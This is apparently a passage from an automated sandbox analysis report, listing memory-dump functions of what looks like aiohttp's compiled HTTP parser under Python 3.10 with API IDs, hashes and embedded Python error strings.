                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF26995
                                                                                                                                                                                                                                    • _Py_Dealloc.PYTHON310(?,?,00007FFBAAF34788,00001768,00000000,00007FFBAAF26A0D,?,?,?,?,00007FFBAAF07A8E), ref: 00007FFBAAF269AB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$Err_ExceptionException_NormalizeTraceback
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2316155915-0
                                                                                                                                                                                                                                    • Opcode ID: 914f6b9baeb2aaca218c9e49dd1f2e8384bb7dbfd6bf696a98001349bd1f1839
                                                                                                                                                                                                                                    • Instruction ID: c14ab03996049bb4040483331b90d2c695a863d1537d158173d19076605e47ee
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 914f6b9baeb2aaca218c9e49dd1f2e8384bb7dbfd6bf696a98001349bd1f1839
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C518DB6A0AF41C1DB9A8F35E854129B3A8FB58F94B188471CE9C83714CF3ED45AC720
                                                                                                                                                                                                                                    Function 00007FFBAAF17FA0 Relevance: 12.1, APIs: 8, Instructions: 105COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3617616757-0
                                                                                                                                                                                                                                    • Opcode ID: 2799e33cad7df17ad2b5f05c6cb7d5ad214d5bca6b6db2c5015863b4a719d01b
                                                                                                                                                                                                                                    • Instruction ID: 1d7cd8a470a39c47cf87ff907f32d41f35896e983fa8b611cc56e8e9f012fb58
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2799e33cad7df17ad2b5f05c6cb7d5ad214d5bca6b6db2c5015863b4a719d01b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A34195B690AE05C1EB5FAF76E95007837B8FB54B56B1445B6CE2D83320CF2ED4428360
                                                                                                                                                                                                                                    Function 00007FFBAAF26BB0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dict_Err_FormatNext
                                                                                                                                                                                                                                    • String ID: %.200s() keywords must be strings$%s() got an unexpected keyword argument '%U'
                                                                                                                                                                                                                                    • API String ID: 4074058445-1494077997
                                                                                                                                                                                                                                    • Opcode ID: 8ffa3fa0e70fece9eb992863e8a0e606aa77c9d3c2f011a188a14575dc8fe9be
                                                                                                                                                                                                                                    • Instruction ID: 3f10b926a914fcb42b5fce0d8ab6e399514633f11f1fa0b0b41460cba9ab1198
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ffa3fa0e70fece9eb992863e8a0e606aa77c9d3c2f011a188a14575dc8fe9be
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8831D4A2A19A41C1E7859F35F8407A9B3A4FBD8B85F545071EE8E83714CF3ED486C720
                                                                                                                                                                                                                                    Function 00007FFBAAF26FC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CallErr_Recursive$EnterLeaveOccurredString
                                                                                                                                                                                                                                    • String ID: while calling a Python object$NULL result without error in PyObject_Call
                                                                                                                                                                                                                                    • API String ID: 1825350209-1256585865
                                                                                                                                                                                                                                    • Opcode ID: 3e0c1f3b583ed904d77199725b658d8ca63907b1c178fa783aee72da0b5ecc70
                                                                                                                                                                                                                                    • Instruction ID: 8ae8ef7db59eecd5a38627c2d9db0e07017ba8eb52d1cb9883a4072df0c1505a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e0c1f3b583ed904d77199725b658d8ca63907b1c178fa783aee72da0b5ecc70
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D118691B09A42C1EF499B36F4541696754FB84FC5F085075DE1D83754DF2EE48BC320
                                                                                                                                                                                                                                    Function 00007FFBAAF27420 Relevance: 9.1, APIs: 6, Instructions: 120COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$AttrMethod_Object_SubtypeTuple_Type_
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2838696399-0
                                                                                                                                                                                                                                    • Opcode ID: 75c07022fa956bfcc9d8b6180236dff9748b1f2626edc6a3add62eacb3b3da0d
                                                                                                                                                                                                                                    • Instruction ID: 8db1805b8eb1ca309d0a522a971697fb0df383844ad3ebc0beb7908ef0144cd3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75c07022fa956bfcc9d8b6180236dff9748b1f2626edc6a3add62eacb3b3da0d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D5183F2A0AB41C1EB6A9F35E46017967A8EF44F81F0844B5CE5D83794DF3EE4468360
                                                                                                                                                                                                                                    Function 00007FFBAAF28FF0 Relevance: 9.1, APIs: 6, Instructions: 74COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$ClearErr_ImportImport_LevelList_ModuleObject
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 449435975-0
                                                                                                                                                                                                                                    • Opcode ID: 4d4f709af908074a74f8ba25bd54145c92cc616446c139868dc36c581aea49ca
                                                                                                                                                                                                                                    • Instruction ID: 981d79fcc8feb4a143d3d44553eb34b0d1abbbaa81b41ae82c96836d58f69c08
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d4f709af908074a74f8ba25bd54145c92cc616446c139868dc36c581aea49ca
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98313C75A0AB89C1EB4A9F35E8942A87368FB44F99F084075CE5D47764DF2FE056C320
                                                                                                                                                                                                                                    Function 00007FFBAAF2A800 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80threadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Err_$DeallocNoneState_StringThreadUnchecked
                                                                                                                                                                                                                                    • String ID: can't send non-None value to a just-started generator
                                                                                                                                                                                                                                    • API String ID: 969891223-3187425046
                                                                                                                                                                                                                                    • Opcode ID: 6277c8053d5b532fb4994edc4439885c69d64f8ad4eefc0abb4356ded84228b3
                                                                                                                                                                                                                                    • Instruction ID: a18bad6578183a3060afd431f9e9f905926245238d42e93f79aa5e969bed4df1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6277c8053d5b532fb4994edc4439885c69d64f8ad4eefc0abb4356ded84228b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 663170A2A06A41C2EB5A9B36E55036873A4FB48B84F045071CF5DC7754DF3DE4A68320
                                                                                                                                                                                                                                    Function 00007FFBAAF297F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Err_Format
                                                                                                                                                                                                                                    • String ID: %.200s() needs an argument$%.200s() takes exactly one argument (%zd given)$%.200s() takes no keyword arguments
                                                                                                                                                                                                                                    • API String ID: 376477240-2104551967
                                                                                                                                                                                                                                    • Opcode ID: c16e0fcdc57aa5166907a82d8846078a17deff2cfcb021dc2d73204346a6751f
                                                                                                                                                                                                                                    • Instruction ID: 9568182994f0aa22c246581a4fc6c9d5477d70585942e290498bce39b5cd4150
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c16e0fcdc57aa5166907a82d8846078a17deff2cfcb021dc2d73204346a6751f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED1193E5E0AA42C1EB1E9B36C4902F413A5BB45B95FD40171CD2E87390DE6FD59B8320
                                                                                                                                                                                                                                    Function 00007FFBAAF2BBA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Err_S_snprintfWarn
                                                                                                                                                                                                                                    • String ID: aiohttp._http_parser$compile time Python version %d.%d of module '%.100s' %s runtime version %d.%d$does not match
                                                                                                                                                                                                                                    • API String ID: 1038695789-940319404
                                                                                                                                                                                                                                    • Opcode ID: 09bb39c88d57da56fad7e63dc0f12bc9827ae930565bb989df15ca791aa67c4c
                                                                                                                                                                                                                                    • Instruction ID: 5afe2af9106fa939cb332a4b30f5ddb9ae8a1237a1d36305a2072059498946fc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09bb39c88d57da56fad7e63dc0f12bc9827ae930565bb989df15ca791aa67c4c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97115271A19A41C5E7699B34F8513EAB394FB88344F800176D99E87755DF3DD106CB20
                                                                                                                                                                                                                                    Function 00007FFBAAF25C40 Relevance: 7.6, APIs: 5, Instructions: 69threadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dealloc$State_ThreadUnchecked
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3754167505-0
                                                                                                                                                                                                                                    • Opcode ID: d704c2e779b35c3afa629f3d8ba6953454643d8ff8859cd9633ad1bc43db857b
                                                                                                                                                                                                                                    • Instruction ID: 91164a9a4d99c9eb6b04411dd732c1f98cf2d9158b748838d4f3ed2e16f105d8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d704c2e779b35c3afa629f3d8ba6953454643d8ff8859cd9633ad1bc43db857b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E3186B5A0FB41C1EB5A9B71E45417973A8FF45B81F4840B5CE9E83B50DF2EE4468320
                                                                                                                                                                                                                                    Function 00007FFBAAF28C10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DeallocErr_String
                                                                                                                                                                                                                                    • String ID: function's dictionary may not be deleted$setting function's dictionary to a non-dict
                                                                                                                                                                                                                                    • API String ID: 1259552197-2577330722
                                                                                                                                                                                                                                    • Opcode ID: b1832a1628ac1ec45ffbae4df105ce1ca3046a18fbfe17280c7752304189e982
                                                                                                                                                                                                                                    • Instruction ID: ac975ded80b75cbee66186699eeda429daecf7ffc16e244baad57d1f26fe82f4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1832a1628ac1ec45ffbae4df105ce1ca3046a18fbfe17280c7752304189e982
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CF0C8F6E47A02C1EB5EAB35D85027423A8BF84B95F9041B1CD1D82250DF2ED05B8320
                                                                                                                                                                                                                                    Function 00007FFBAAF1E3D0 Relevance: 6.2, APIs: 4, Instructions: 243COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttrObject_$DisableEnableReadyType_
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3217214912-0
                                                                                                                                                                                                                                    • Opcode ID: 988189a9178164202d2acadced9c393ce3a32f604d320124b1143355a1618faa
                                                                                                                                                                                                                                    • Instruction ID: 7bad4f26c5cfcade4e4690ef739a2dcbd8568537fc491b0bc536ee7f478615a3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 988189a9178164202d2acadced9c393ce3a32f604d320124b1143355a1618faa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EE187B5A0AB46C1E64A9B35D8912B427ACFB44B54F4012B2DE4CC7365EF3EE497D320
                                                                                                                                                                                                                                    Function 00007FFBAAF273A0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Tuple_$CallDeallocObject_SizeSlice
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 387090426-0
                                                                                                                                                                                                                                    • Opcode ID: 1bc982df166f6d3f6d90821d47e47b8012d8173ecf0e8bb6108df7ceba8631cd
                                                                                                                                                                                                                                    • Instruction ID: e46accd74c8435aa6e7bdccef407a272d4506f5bbba193c0208cd6605733c306
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bc982df166f6d3f6d90821d47e47b8012d8173ecf0e8bb6108df7ceba8631cd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7F08161B0AB81C1EA499B73F954069A664EB88FC5B084070EE1E57B19DE2DD4828710
                                                                                                                                                                                                                                    Function 00007FFBAAF06B34 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Dict_Size
                                                                                                                                                                                                                                    • String ID: __init__$aiohttp._http_parser.RawRequestMessage.__init__
                                                                                                                                                                                                                                    • API String ID: 1288431816-4042305137
                                                                                                                                                                                                                                    • Opcode ID: 3c73d352a82e4de11d0ff0aa46e22f9f032a28eb66097bbb1c15bdab2b1d710d
                                                                                                                                                                                                                                    • Instruction ID: 68812e9cf2a6aeeed2806558c865e938f3769ecdf02ffa0b04f2e3a62d2c3da7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c73d352a82e4de11d0ff0aa46e22f9f032a28eb66097bbb1c15bdab2b1d710d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1415BB6A0AF45C9E745DB65E84019D73B8F748B98F100166EE8C93B68EF39D0A2C710
                                                                                                                                                                                                                                    Function 00007FFBAAF2B7C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DeallocErr_String
                                                                                                                                                                                                                                    • String ID: __name__ must be set to a string object
                                                                                                                                                                                                                                    • API String ID: 1259552197-1372955150
